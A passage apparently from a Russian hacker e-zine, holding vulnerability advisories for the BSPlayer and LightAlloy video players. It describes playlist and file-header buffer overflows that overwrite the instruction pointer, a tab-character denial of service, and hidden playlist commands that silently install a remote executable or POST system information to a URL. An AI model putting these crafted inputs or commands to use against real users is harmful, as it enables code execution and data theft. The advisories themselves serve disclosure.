Q: зачем хакеру хорошая видеокарта?
A: чтобы был хорошо виден мусорный
файл в 3-мерной файловой системе

+--------------------------------------------------------------------------------------------------------------------------[release: 01.04.05]----+
|
|
|
|
|
|
|
  _|_|  _|_|_|  _|  _|    _|  _|_|_|      _|_|    _|  _|  _|   _|  _|    _|_|             _|  _|    _|_|_|
_|      _|  _|      _|_|_|_|  _|          _|  _|  _|  _|  _|_| _|      _|      m        _|_|_|_|_|  _|  _|
_|      _|_|    _|  _| _| _|  _|_|    &   _|_|    _|  _|  _| _|_|  _|  _|_|_|    e        _|  _|    _|  _|
_|      _| _|   _|  _|    _|  _|          _|      _|_|_|  _|   _|  _|      _|      n    _|_|_|_|_|  _|  _|
  _|_|  _|  _|  _|  _|    _|  _|_|_|      _|        _|_|  _|   _|  _|  _|_|  h       t    _|  _|    _|_|_|
|
|
|
|
|
|
|
+-------------------------------------------------------------------------------------------------------------------------------------------------------+
+--------------------------------------------------[0x04: Уязвимости в видеоплейерах]--------------------------------------------------+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

[New Wave Hack Team advisory]
[Product: BSPlayer ]
[Version: <=0.87 (>0.87?) ]


[1. Переполнение буфера при разборе плейлистов (*.bsl)]

Фрагмент плейлиста:
...
F:\Video\animatrix.avi
F:\Video\antitrust.AVI
aaa..(всего a*1024)aaaa
...

Он устанавливает значение IP в 0x61616161.



[2. DOS при разборе плейлистов]

При встрече символа с кодом 0x09 (TAB) в имени файла, уровень загрузки процессора близок к 100%.


[3. "Пасхальные яйца" в версии для Windows]
Указанные ниже команды можно передать через плейлист (возможно, существуют и альтернативные пути).

Установка кодеков без оповещения пользователя (exe-файл запускается без предупреждения):
installexe://url_to_exe

Передача информации о системе (передается методом POST скрипту):
sysinfo://url_to_script



[New Wave Hack Team advisory]
[Product: LightAlloy ]
[Version: <=2.0 ]


[1. Переполнение буфера при проигрывании видеофайла]

При встрече в начале файла 80 подряд идущих нулей (0x00), 512 следующих байт заносятся в память, а IP принимает значение, лежащее по смещению 0x0250.


[2. Переполнение буфера при разборе плейлиста LightAlloy.lap]

Эта уязвимость представляет очень малую опасность, т.к. плейлист всего лишь один, и он создается и редактируется исключительно самой программой.

...
C:\Video\Семь.avi
>N Семь

C:\Video\Пункт назначения.avi
>N Пункт назначения

C:\Video\Пункт назначения.avi
>N aaa..(ax512)aaaa
...

Вызывает сообщение "программа выполнила недопустимую операцию и будет закрыта". При этом ESP=0x61616161.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
+-----[content]-----------------------------------------------------------------------------------------------------------------------[mail us]-----+